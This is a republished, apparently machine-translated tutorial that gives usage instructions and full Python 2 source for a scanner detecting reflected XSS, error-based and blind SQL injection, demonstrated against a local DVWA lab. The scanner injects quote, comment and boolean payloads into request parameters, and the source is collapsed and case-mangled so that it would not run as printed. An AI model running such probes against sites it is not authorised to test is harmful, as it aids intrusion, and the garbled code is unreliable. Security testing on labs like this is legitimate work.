Python script Implementation Web Vulnerability Scanning Tool

Source: Internet
Author: User
Tags http cookie simple sql injection access database
This is a web vulnerability scanning gadget made last year, mainly for simple SQL injection vulnerabilities, SQL blinds and XSS vulnerabilities, code is to see the github foreign God (heard is one of the writers of SMAP) two small tools source, according to the idea of their own writing. The following are the usage instructions and source code.

First, instructions for use:

1. Operating Environment:

Linux command line interface +python2.7

2. Program Source code:

Vim scanner//to create a file named scanner

Chmod a+xscanner//Modify the file permissions for the executable

3. Run the program:

Python scanner//Running files

If you do not carry the target URL information, the interface outputs help information, reminding you which parameters can be entered.

Parameters include:

--h Output Help information
--url scanned URLs
--data parameters of the POST request method
--cookie HTTP request Header Cookie value
--user-agent HTTP request Header User-agent value
--random-agent whether to use browser camouflage
--referer the previous interface of the destination URL
--proxy HTTP request Header proxy value

For example, scan "Http://127.0.0.1/dvwa/vulnerabilities/sqli/?id=&Submit=Submit"

Python scanner--url= "Http://127.0.0.1/dvwa/vulnerabilities/sqli/?id=&Submit=Submit"--cookie= "security=low; Phpsessid=menntb9b2isj7qha739ihg9of1 "

The output scan results are as follows:

The results show:

There is an XSS vulnerability, vulnerability Matching vulnerability signature Library ""; xss.< "", which belongs to the type outside of the embedded label.

There is a SQL injection vulnerability in which the target Web server's database type is mysql.

There is a blind SQL injection vulnerability.

Second, the source code:

Code verification can run, I personally recommend using DVWA test it.

#!-*-coding:utf-8-*-import Optparse, random, Re, string, Urllib, urllib2,difflib,itertools,httplib NAME = "Scanner for RX"  SS and SQLI "AUTHOR =" Lishuze "prefixes = (" ",") "," ' "," ') "," \ "") Suffixes = ("", "---", "#") Boolean_tests = ("and %d=%d "," OR Not (%d=%d) ") Tamper_sql_char_pool = (' (' (', ') ', ' \ ' ', ' ' ' ') ' Tamper_xss_char_pool = (' \ ' ', '" ', ' > ', ' &lt ;', ';') GET, post = "Get", "post" Cookie, UA, REFERER = "Cookie", "user-agent", "REFERER" TEXT, Httpcode, TITLE, HTML = xrange (4) _h Eaders = {} user_agents = ("mozilla/5.0 (X11; Linux i686; rv:38.0) gecko/20100101 firefox/38.0 "," mozilla/5.0 (Windows NT 6.1; WOW64) applewebkit/537.36 (khtml, like Gecko) chrome/45.0.2454.101 safari/537.36 "," mozilla/5.0 (Macintosh; U Intel Mac OS X 10_7_0; En-US) applewebkit/534.21 (khtml, like Gecko) chrome/11.0.678.0 safari/534.21 ",) Xss_patterns = ((R" <!--[^>]*% (Ch ARS) s|% ( Chars) s[^<]*--> "," \ "<!--. '. XSS. '. -->\ ", Inside the comment", None), (R "(? s) <script[^>]*>[^<] *?' [^< ']*% (chars) s|% ( chars) s[^< ']* ' [^<]*</script>, ' \ ' <script>. '. XSS. '. </script>\ ", enclosed by <script> tags, inside single-quotes", None), (R ' (? s) <script[^>]*>[^<] *?" [^< "]*% (chars) s|% ( Chars) s[^< "]*" [^<]*</script> ', "' <script>.\". xss.\ ".</script>", enclosed by <script> tags, inside double-quotes ", None), (R" (? s) <script[^>]*>[^<]*?% ( Chars) s|% ( Chars) s[^<]*</script> "," \ "<script>.xss.</script>\", enclosed by <script> tags ", None), (R ">[^<]*% (chars) s[^<]* (<|\z)", "\" >.xss.<\ ", outside of tags", r "(? s) <script.+?</script>| <!--. *?--> "), (r" <[^>]* ' [^> ']*% (chars) s[^> ']* ' [^>]*> "," \ "&LT;.. XSS. '. >\ ", inside the tag, inside Single-quotes", R "(? s) <script.+?</script>|<!--. *?-->"), (R ' <[^>]* "[^>"]*% (chars) s[^> "]*" [^>]*> "," ' <.\ ". xss.\" .> ", inside the tag, inside Double-quotes", R "(? s) < Script.+?</script>|<!--. *?--> "), (R" <[^>]*% (chars) s[^>]*> "," \ "<.xss.>\", inside the tag, outside of quotes ", R" (? s) <script.+?</script>|<!--. *?--> ")) dbms_errors = {" MySQL ": (r" SQL syntax.* MySQL ", R" warning.*mysql_.* ", r" valid MySQL result ", R" mysqlclient\. ")," Microsoft SQL Server ": (r" driver.* sql[\-\_\]*s Erver ", r" OLE db.* SQL Server ", r" (\w|\a) SQL Server.*driver ", r" warning.*mssql_.* ", R" (\w|\a) SQL Server.*[0-9a-fa-f]{8} ", R" (? s) exception.*\wsystem\. Data\. Sqlclient\. ", R" (? s) exception.*\wroadhouse\. Cms\. ")," Microsoft Access ": (r" Microsoft Access Driver ", r" JET database Engine ", r" Access Database Engine ")," Oracle ": (R "Ora-[0-9][0-9][0-9][0-9]", r "Oracle error", R "Oracle.*driver", R "warning.*\woci_.*", R "warning.*\wora_.*")} def _ RETRIEVE_CONTENT_XSS (URL, data=none): Surl= "" For I in Xrange (len (URL)): If I > Url.find ('? '): Surl+=surl.join (Url[i]) . replace (","%20 ") Else:surl+=surl.join (url[i]) Try:req = Urllib2. Request (sURL, data, _headers) retval = Urllib2.urlopen (req, timeout=30). Read () except Exception, Ex:retval = GetAttr (ex, "message", "") Retu RN retval or "" Def _retrieve_content_sql (URL, data=none): retval = {httpcode:httplib. OK} surl= "" For I in Xrange (len (URL)): If I > Url.find ('? '): Surl+=surl.join (Url[i]). Replace (","%20 ") Else:surl+=sur L.join (url[i]) Try:req = Urllib2. Request (sURL, data, _headers) retval[html] = Urllib2.urlopen (req, timeout=30). Read () except Exception, ex:retval[ Httpcode] = GetAttr (ex, "Code", None) retval[html] = GetAttr (ex, "message", "") match = Re.search (R <title> (? p<result>[^<]+) </title> ", retval[html], re. I) Retval[title] = Match.group ("result") if match else noneretval[text] = Re.sub (r "(? si) <script.+?</script>| <!--. +?-->|<style.+?</style>|<[^>]+>|\s+ "," ", retval[html]) return retval def SCAN_PAGE_XSS (URL, data=none): print "Start scanning rxss:\n" retval, usable = False, Falseurl = Re.sub (r "= (&|\z)", "=1\g<1> ", url) if URL else url data=re.sub (r" = (&|\z) "," =1\g<1> ", data) if data else data try:for phase in (GET, POST): current = URL If phase are GET else (data or "") for match in Re.finditer (r "(\a|[? &]) (? p<parameter>[\w]+) =) (? p<value>[^&]+) ", current): found, usable = False, trueprint" scanning%s parameter '%s ' "% (phase, Match.group (" Parameter ")) prefix = (" ". Join (Random.sample (String.ascii_lowercase, 5))) suffix = (" ". Join (Random.sample ( String.ascii_lowercase, 5))) if not found:tampered = Current.replace (match.group (0), "%s%s"% (Match.group (0), Urllib.qu OTE ("%s%s%s%s"% ("'", Prefix, "" ". Join (Random.sample (Tamper_xss_char_pool, Len (Tamper_xss_char_pool))), suffix))) Content = _RETRIEVE_CONTENT_XSS (tampered, data) If phase is GET else _RETRIEVE_CONTENT_XSS (URL, tampered) for sample in Re . Finditer ("%s" ([^]+?) %s "% (prefix, suffix), content, re. I): #print Sample.group () for Regex, info, content_removal_regex in xss_patterns:context = Re.search (regex% {"chars": Re.escape (Sample.group (0))}, Re.sub (Content_removal_regex or "", "", content), re. I) If context and not found and Sample.group (1). Strip (): PRINT "!!!  %s parameter '%s ' appears to is XSS vulnerable (%s) "% (phase, Match.group (" parameter "), info) found = RetVal = Trueif not Usable:print "(x) no usable get/post parameters found" except Keyboardinterrupt:print "\ r (x) ctrl-c pressed" return ret Val def scan_page_sql (URL, data=none): print "Start scanning sqli:\n" retval, usable = False, Falseurl = Re.sub (r "= (&|\ Z) "," =1\g<1> ", url) if URL else url data=re.sub (r" = (&|\z) "," =1\g<1> ", data) if data else data try:for p Hase in (GET, POST): current = URL If phase was GET else (data or "") for Match in Re.finditer ((\a|[? &]) (? p<parameter>\w+) =) (? p<value>[^&]+) ", current): vulnerable, usable = False, trueoriginal=noneprint" scanning%s parameter '%s ' "% (ph ASE, Match.group ("parameter")) tampered = Current.replace (match.group (0), "%s%s"% (match.gRoup (0), Urllib.quote ("". Join (Random.sample (Tamper_sql_char_pool, Len (Tamper_sql_char_pool))))) content = _ Retrieve_content_sql (tampered, data) If phase is GET else _retrieve_content_sql (URL, tampered) for (DBMS, regex) in (DBMS , regex) for DBMS in dbms_errors to regex in Dbms_errors[dbms]): If not vulnerable and re.search (regex, content[html], re . I): PRINT "!!! %s parameter '%s ' could be error SQLi vulnerable (%s) "% (phase, Match.group (" parameter "), DBMS) retval = vulnerable = Tru evulnerable = Falseoriginal = Original or (_retrieve_content_sql (current, data) if phase is GET else _retrieve_content_sql (URL, current)) For Prefix,boolean,suffix in Itertools.product (prefixes,boolean_tests,suffixes): if not vulnerable:template = "%s%s%s" % (prefix,boolean, suffix) payloads = Dict ((_, Current.replace (Match.group (0), "%s%s"% (Match.group (0), Urllib.quote (  Template% (1 if _ Else 2, 1), safe= '% '))))) contents = Dict ((_, _retrieve_content_sql (Payloads[_], Data) If PHASE is GET-else _retrieve_content_sql (URL, payloads[_]))) If all (_[httpcode] for _ in (original, con Tents[true], Contents[false])) and (any (original[_] = contents[true][_]! = Contents[false][_] For _ In (Httpcode, TITLE)) ): vulnerable = Trueelse:ratios = Dict ((_, Difflib. Sequencematcher (None, Original[text], Contents[_][text]). Quick_ratio ()) for _ In (True, False)) vulnerable = ALL ( Ratios.values ()) and ratios[true] > 0.95 and Ratios[false] < 0.95if vulnerable:print "!!! %s parameter '%s ' could is error Blind SQLi vulnerable "% (phase, Match.group (" parameter ")) RetVal = Trueif not USABLE:PR int "(x) no usable get/post parameters found" except Keyboardinterrupt:print "\ r (x) ctrl-c pressed" return retval def INI T_options (Proxy=none, Cookie=none, Ua=none, Referer=none): global _headers _headers = Dict (Filter lambda _: _[1], ((Cooki E, Cookie), (UA, UA or NAME), (REFERER, REFERER))) Urllib2.install_opener (Urllib2.build_opener (urllib2. Proxyhandler ({' http ': ProXY})) if proxy else None) if __name__ = = "__main__": print "------------------------------------------------------------- ---------------------"print"%s\nby:%s "% (NAME, AUTHOR) print"---------------------------------------------------- ------------------------------"parser = Optparse. Optionparser () parser.add_option ("--url", dest= "url", help= "Target url") parser.add_option ("--data", dest= "data", help= "POST data") parser.add_option ("--cookie", dest= "Cookie", help= "HTTP Cookie Header Value") parser.add_option ("-- User-agent ", dest=" UA ", help=" HTTP user-agent Header Value ") parser.add_option ("--random-agent ", dest=" Randomagent ", Action= "Store_true", help= "use randomly selected HTTP user-agent header value") parser.add_option ("--referer", dest= " Referer ", help=" http Referer header Value ") parser.add_option ("--proxy ", dest=" proxy ", help=" HTTP proxy address ") Options, _ = Parser.parse_args () if Options.url:init_options (Options.proxy, Options.cookie, options.ua if not options.ra Ndomagent ElseRandom.choice (user_agents), options.referer) result_xss= SCAN_PAGE_XSS (Options.url if Options.url.startswith ("http" Else "http://%s"% Options.url, options.data) print "\nscan results:%s vulnerabilities found"% ("possible" if result_x SS Else "no") print "----------------------------------------------------------------------------------" Result_sql = Scan_page_sql (Options.url if Options.url.startswith ("http") Else "http://%s"% Options.url, options.data) print "\ Nscan results:%s vulnerabilities found "% (" possible "if result_sql else" no ") print"----------------------------------- -----------------------------------------------"Else:parser.print_help ()

The above is a small series to introduce the Python script to implement Web Vulnerability scanning Tool, I hope that we have some help, if you have any questions please give me a message, small series will promptly reply to everyone. Thank you very much for your support for topic.alibabacloud.com!

Related Article

Contact Us

The content source of this page is from Internet, which doesn't represent Alibaba Cloud's opinion; products and services mentioned on that page don't have any relationship with Alibaba Cloud. If the content of the page makes you feel confusing, please write us an email, we will handle the problem within 5 days after receiving your email.

If you find any instances of plagiarism from the community, please send an email to: info-contact@alibabacloud.com and provide relevant evidence. A staff member will contact you within 5 working days.

A Free Trial That Lets You Build Big!

Start building with 50+ products and up to 12 months usage for Elastic Compute Service

  • Sales Support

    1 on 1 presale consultation

  • After-Sales Support

    24/7 Technical Support 6 Free Tickets per Quarter Faster Response

  • Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.